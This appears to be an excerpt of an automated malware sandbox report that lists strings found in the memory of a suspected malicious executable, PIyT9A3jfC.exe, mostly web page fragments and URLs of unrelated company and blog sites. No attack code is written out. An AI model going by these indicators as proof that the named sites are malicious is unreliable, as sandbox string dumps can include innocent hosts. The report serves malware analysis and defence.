                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" data-src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" /><noscript><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></noscript></a> equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.799425156.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-dd39117" href="https://www.linkedin.com/company/comsit-distribution-gmbh/" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.14.1","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.facebook.com (Facebook)
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen","a11yCarouselWrapperAriaLabel":"Carousel | Horizontal scrolling: Arrow Left & Right","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.14.1","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.twitter.com (Twitter)
                  Source: pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585974089.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588156336.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586890411.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.586479452.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.587455999.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cer-slo.si/predstavitev.html
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://erp-companion.com-sit.com/de/user/login
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707308419.0000000008000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
